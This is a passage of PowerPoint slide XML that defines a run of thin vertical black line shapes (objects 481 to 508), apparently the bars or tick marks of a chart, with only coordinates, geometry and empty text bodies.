            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="object 481"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327819" y="4884234"/>
            <a:ext cx="2517" cy="848127"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="427989">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="427983"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="object 482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7356000" y="4909212"/>
            <a:ext cx="0" cy="824218"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="415925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="415379"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="object 483"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7354343" y="4907529"/>
            <a:ext cx="2517" cy="825475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="416560">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="416228"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="object 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7383906" y="4892029"/>
            <a:ext cx="0" cy="840577"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="424180">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="424049"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="object 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7383634" y="4893661"/>
            <a:ext cx="1258" cy="839319"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="423544">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="423226"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="object 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411758" y="4893124"/>
            <a:ext cx="0" cy="839319"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="423544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="423497"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="object 487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7409019" y="4894164"/>
            <a:ext cx="2517" cy="839319"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="423544">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="422972"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="object 488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7439119" y="4909212"/>
            <a:ext cx="0" cy="824218"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="415925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="415379"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="object 489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7438845" y="4907529"/>
            <a:ext cx="0" cy="825475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="416560">
                <a:moveTo>
                  <a:pt x="0" y="415952"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="416228"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="object 490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467024" y="4919389"/>
            <a:ext cx="0" cy="814152"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="410844">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="410242"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="object 491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7466751" y="4918005"/>
            <a:ext cx="2517" cy="815410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="411480">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="410941"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="object 492"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494876" y="4959609"/>
            <a:ext cx="0" cy="773884"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="390525">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="389947"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="object 493"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7493520" y="4959609"/>
            <a:ext cx="1258" cy="773884"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="390525">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="389947"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="object 494"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522782" y="4994464"/>
            <a:ext cx="0" cy="738651"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="372744">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="372358"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="object 495"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522510" y="4993080"/>
            <a:ext cx="1258" cy="739909"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="373380">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="373056"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="object 496"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7550636" y="5016460"/>
            <a:ext cx="0" cy="716000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="361314">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="361258"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="object 497"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7548185" y="5014778"/>
            <a:ext cx="2517" cy="718517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="362585">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="362107"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="object 498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578542" y="5049172"/>
            <a:ext cx="0" cy="683283"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="344805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="344745"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="object 499"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7578268" y="5047210"/>
            <a:ext cx="0" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="346075">
                <a:moveTo>
                  <a:pt x="0" y="345465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="345741"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="object 500"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605900" y="5053998"/>
            <a:ext cx="0" cy="679508"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="342900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="342315"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="object 501"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605627" y="5055039"/>
            <a:ext cx="2517" cy="678250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="342264">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="341790"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="object 502"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7633752" y="5101712"/>
            <a:ext cx="0" cy="631691"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="318769">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="318237"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="object 503"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7632687" y="5100330"/>
            <a:ext cx="1258" cy="632949"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="319405">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="318935"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="object 504"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7661660" y="5127474"/>
            <a:ext cx="0" cy="605266"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="305435">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="305231"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="object 505"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7661386" y="5129362"/>
            <a:ext cx="2517" cy="604007"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="304800">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="304284"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="object 506"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689566" y="5154791"/>
            <a:ext cx="0" cy="577582"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="291464">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="291452"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="object 507"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7687362" y="5153697"/>
            <a:ext cx="2517" cy="578840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="292100">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="292004"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="object 508"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7717418" y="5203052"/>
            <a:ext cx="0" cy="529765"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="267335">
                <a:moveTo>
